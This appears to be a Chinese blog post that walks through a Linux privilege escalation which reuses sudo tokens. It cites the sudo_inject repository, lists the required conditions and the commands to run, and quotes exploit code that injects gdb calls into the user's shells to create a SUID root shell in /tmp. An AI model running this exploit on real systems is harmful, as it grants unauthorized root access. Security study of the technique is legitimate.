sudo token提权

Linux提权

创建时间:2019-05-04 10:58

阅读:

sudo token提权
使用条件
利用方法

sudo token提权

昨日在安全热点中见到一个说到sudo的token
来获得root权限

Referer:sudo token提权
仓库地址:https://github.com/nongiach/sudo_inject

使用条件

Ptrace完全启用（/ proc / sys / kernel / yama / ptrace_scope == 0）。
当前用户必须具有具有相同uid的有效sudo令牌的生活进程。

利用方法

下载上面所说的仓库地址，在本地执行echo 0 > /proc/sys/kernel/yama/ptrace_scope模拟一个环境

执行以下两条命令，你将获得一个root权限的终端

sh exploit_v2.sh
/tmp/sh -p

看了一下exploit_v2.sh里的利用代码

# create suid shell
echo "Creating suid shell in /tmp/sh"
echo "Current process : $$"
# inject all shell belonging to the current user, our shell one :p
for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" | grep -v "^$$\$")
do
        echo "Injecting process $pid -> "$(cat "/proc/$pid/comm")
    echo 'call system("echo | sudo -S cp /bin/sh /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/sh >/dev/null 2>&1")' \
        | gdb -q -n -p "$pid" >/dev/null 2>&1
done

文章还有其他的操作，详情请看仓库地址

你可以自由地：
分享 – 在任何媒介或格式下再分发、传播本创作。
只要遵守下述条款规定，授权人将不能撤回你使用本创作的自由。
唯须遵循以下条款：
署名 – 你必须以给予姓名标注，并提供本许可证的链接。同时你需要声明公开的创作是否经过修改。你可以采用恰当的形式将相关信息表述出来，但不得以任何形式暗示授权人已正式认可了你以及你的使用行为。
非商业性 – 你不得将本创作运用于商业目的。
禁止演绎 – 如果你对本创作进行了重混、转换、依据本创作进行再创作等行为，你不得再次公开散布经过修改的创作。
不得增加额外限制 – 你不能增设任何法律限制或是技术限制，来限制他人进行本许可证已经允许的行为。

声明：
当你使用本创作中属于公众领域的元素，或当法律有额外或限制条款允许你的使用行为时，则你不需要遵守本授权协议。

不提供保证。本授权协议并不能完全提供你预期需要的所有许可，例如：公共形象权，隐私权，著作人身权等其他权利，这些权利的法律限制可能会限制你使用本创作。

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。